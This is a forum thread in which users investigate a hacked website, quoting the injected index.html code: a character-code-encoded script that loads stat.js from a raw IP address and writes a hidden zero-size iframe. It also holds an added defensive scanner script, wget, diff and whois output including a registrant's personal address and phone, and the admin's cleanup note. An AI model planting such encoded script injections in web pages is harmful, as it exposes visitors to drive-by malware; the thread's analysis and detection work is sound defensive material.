Please make safe again!

Joined: 2007-09-10

As I pointed out here: is not safe.

Now I'm no expert in web security, but I think if the .html code has been changed, the server has been compromised...

I made a little investigation to see what exactly happens there:
The html code of the page contains a javascript part which gets a script stat.js from

The code in index.html:

<script language="javascript">
var s="",i,c=0,o="";
var str="60|115|99|114|105|112|116|32|116|121|112|101|61|34|116|101|120|116|47|106|97|118|97|115|99|114|105|112|116|34|32|115|114|99|61|34|104|116|116|112|58|47|47|56|52|46|50|52|52|46|49|51|56|46|53|53|47|115|116|97|116|115|47|115|116|97|116|46|106|115|34|62|60|47|115|99|114|105|112|116|62|";

Becomes this:

<script language="javascript">
document.write("<script type="text/javascript" src=""></script>");

Currently (may have been different before), stats.js looks like this:;
document.write('<iframe src="" WIDTH="0%" HEIGHT="0%" MARGINHEIGHT="0" MARGINWIDTH="0" SCROLLING="auto" frameborder="0" NORESIZE></iframe>');

Which seems to set up an invisible frame showing , which is currently a page looking like but with some scripts inside it I haven't figured out yet. The page as well as stat.js may have changed anyway since google detected it as an attack site.

I attached all relevant files below, as well as a quick python script I used to decrypt the ascii (main code from Smiling

ascii_decoder.py_.txt (1.33 KB)
index.html (5.96 KB)
stat.js_.txt (215 bytes)
index.html.1 (4.94 KB)
index.html.1.simplified.txt (4.94 KB)
secret.txt (283 bytes)
decoded.txt (118 bytes)
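
An added example, not the ascii_decoder.py attached to the post: a small scanner that finds pipe-separated character-code runs like the one quoted from index.html, decodes them, and reports any remote include in defanged form. The function names are hypothetical and the sample page is constructed around the encoded string from the post.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Encoded string as quoted from index.html in the post above.
ENCODED = "60|115|99|114|105|112|116|32|116|121|112|101|61|34|116|101|120|116|47|106|97|118|97|115|99|114|105|112|116|34|32|115|114|99|61|34|104|116|116|112|58|47|47|56|52|46|50|52|52|46|49|51|56|46|53|53|47|115|116|97|116|115|47|115|116|97|116|46|106|115|34|62|60|47|115|99|114|105|112|116|62|"
# Constructed sample page (not the real index.html) wrapping that string.
SAMPLE_PAGE = '<html><body><script language="javascript">\nvar str="%s";\n</script></body></html>' % ENCODED

# Eight or more decimal codes joined by "|" is unusual in hand-written pages.
CHARCODE_RUN = re.compile(r"(?:\d{1,3}\|){8,}\d{0,3}")

def decode_charcodes(encoded, sep="|"):
    """Decode 'NN|NN|...' decimal character codes; refuse anything else."""
    chars = []
    for tok in encoded.split(sep):
        if not tok:
            continue  # the sample ends with a trailing separator
        if not (tok.isascii() and tok.isdigit()):
            raise ValueError("not a decimal character code: %r" % tok)
        chars.append(chr(int(tok)))
    return "".join(chars)

class SrcCollector(HTMLParser):
    """Collect src attributes of tags that pull in remote content."""
    def __init__(self):
        super().__init__()
        self.sources = []
    def handle_starttag(self, tag, attrs):
        if tag in ("script", "iframe", "frame", "embed"):
            self.sources += [(tag, v) for k, v in attrs if k == "src" and v]

def defang(url):
    """Make a URL non-clickable for reports: hxxp scheme, [.] in the host."""
    p = urlsplit(url)
    return "%s://%s%s" % (p.scheme.replace("http", "hxxp"), p.netloc.replace(".", "[.]"), p.path)

def scan(page_source):
    """Return (tag, defanged src) for every remote include hidden in char-code runs."""
    findings = []
    for run in CHARCODE_RUN.findall(page_source):
        collector = SrcCollector()
        collector.feed(decode_charcodes(run))
        collector.close()
        findings += [(tag, defang(src)) for tag, src in collector.sources]
    return findings

if __name__ == "__main__":
    for tag, src in scan(SAMPLE_PAGE):
        print("hidden <%s> include: %s" % (tag, src))
```

Running the same scan over every served HTML file on a host is a quick way to find other pages carrying the same injection.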
Joined: 2007-09-10
It turns out actually redirects directly to ^^
So index.html.1 is just a normal google page with google scripts.

$wget ""
--2009-04-22 17:02:13--
to connected.
HTTP request sent, awaiting response... 302 Found
Location: [following]
--2009-04-22 17:02:13--
Resolving,,, ...
Connecting to||:80... connected.
HTTP request sent, awaiting response... 302 Found
Location: [following]
--2009-04-22 17:02:13--
Resolving,,, ...
Reusing existing connection to
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Saving to: `index.html.4'

    [ <=>                                                                                                                                                                  ] 5,028       --.-K/s   in 0.03s  

2009-04-22 17:02:13 (157 KB/s) - `index.html.4' saved [5028]

A little diff test (it makes no difference whether it's another wget or a wget

$diff index.html.7 index.html.8
< <html><head><meta http-equiv="content-type" content="text/html; charset=ISO-8859-1"><title>Google</title><script>{kEI:"bjLvScaeMNCNsAaEzcmPBw",kEXPI:"17259,20257",kHL:"de"};
> <html><head><meta http-equiv="content-type" content="text/html; charset=ISO-8859-1"><title>Google</title><script>{kEI:"cDLvSfrHEI-ysAbB4YyDBw",kEXPI:"17259,20257",kHL:"de"};
Joined: 2006-03-28
Here's what a really quick check revealed:

[dennis@thinkpad ~]$ host domain name pointer
[dennis@thinkpad ~]$ whois                    
% This is the RIPE Whois query server #2.                   
% The objects are in RPSL format.                           
% Rights restricted by copyright.                           
% See                 

% Note: This output has been filtered.
%       To receive output for a database update, use the "-B" flag

% Information related to ' -'

inetnum: -
netname:        Serverboost-2                
descr:          IP Space provided by We Dare 
country:        NL                           
admin-c:        Sr4706-RIPE                  
tech-c:         Sr4706-RIPE                  
status:         ASSIGNED PA                  
mnt-by:         WEDARE-MNT                   
source:         RIPE # Filtered              

role:           Serverboost role
address:        Piet Paaltjensplein 62
address:        3027 TZ Rotterdam     
address:        The Netherlands       
phone:          +31 (0)6 1482 4915    
admin-c:        JM6856-RIPE           
tech-c:         JM6856-RIPE           
nic-hdl:        Sr4706-RIPE           
mnt-by:         MNT-I3D               
source:         RIPE # Filtered       

% Information related to ''

descr:        Route to first IP-numberblock We Dare BV
origin:       AS20495                                 
mnt-by:       WEDARE-MNT                              
source:       RIPE # Filtered                         

% Information related to ''

descr:          We Dare B.V.   
origin:         AS20495        
mnt-by:         WEDARE-MNT     
source:         RIPE # Filtered
[dennis@thinkpad ~]$ whois
[Redirected to]     
; This data is provided by Transip BV  
; for information purposes, and to assist persons obtaining information
; about or related to domain name registration records.                
; Transip BV does not guarantee its accuracy.                          
; By submitting a WHOIS query, you agree that you will use this data   
; only for lawful purposes and that, under no circumstances, you will  
; use this data to                                                     
; 1) allow, enable, or otherwise support the transmission of mass      
;    unsolicited, commercial advertising or solicitations via E-mail   
;    (spam); or                                                        
; 2) enable high volume, automated, electronic processes that apply    
;    to this WHOIS server.                                             
; These terms may be changed without prior notice.                     
; By submitting this query, you agree to abide by this policy.         


RSP: Transip BV 

owner-contact: P-DQA565
owner-organization: ardon, d
owner-fname: D              
owner-lname: ardon          
owner-street: eessenkamp 8  
owner-city: wapenveld       
owner-zip: 8191             
owner-country: NL           
owner-phone: +31388442066   

admin-contact: P-DQA565
admin-organization: ardon, d
admin-fname: D              
admin-lname: ardon          
admin-street: eessenkamp 8  
admin-city: wapenveld
admin-zip: 8191
admin-country: NL
admin-phone: +31388442066

tech-contact: P-DQA565
tech-organization: ardon, d
tech-fname: D
tech-lname: ardon
tech-street: eessenkamp 8
tech-city: wapenveld
tech-zip: 8191
tech-country: NL
tech-phone: +31388442066

billing-contact: P-DQA565
billing-organization: ardon, d
billing-fname: D
billing-lname: ardon
billing-street: eessenkamp 8
billing-city: wapenveld
billing-zip: 8191
billing-country: NL
billing-phone: +31388442066


; Transip BV
; Real-time domeinregistratie en -beheer vanaf 4.99 Euro!
Joined: 2006-09-11
I'm fixing this right now. is still hosted in our shared host at DreamHost and it got hacked (well, nothing else can explain this; neither Olivier nor I would do this), so I'm moving it to our dedicated server.

I forgot that KIAaze reported this in another thread, sorry. I started working on this because of

Thank you, reptiler and KIAaze.

Joined: 2007-09-10
Thanks for fixing it.
It's now 100% fixed since Google doesn't mark it as an attack site anymore. :)

I'll remember to use the GLM tracker (or the mailing-list) instead of the forum next time. ;)

By the way: How dangerous is it to be redirected to Google from another server?
Can they somehow intercept authentication data when you have a Google account for example?

Joined: 2007-09-10
Re: Please make safe again!

The bugtracker being a little bit slow, I'll post here again. seems to have been hacked again. :(

I started directing people directly to the FSF site instead because of this.
Hopefully, this will never happen to because I don't know any equivalent for it. ( Bought myself a new GNU/Linux preloaded PC through it from :) )

(If softwareliberty can't be made safe, it would be nice to remove/replace all links to it from the other GLM sites.)
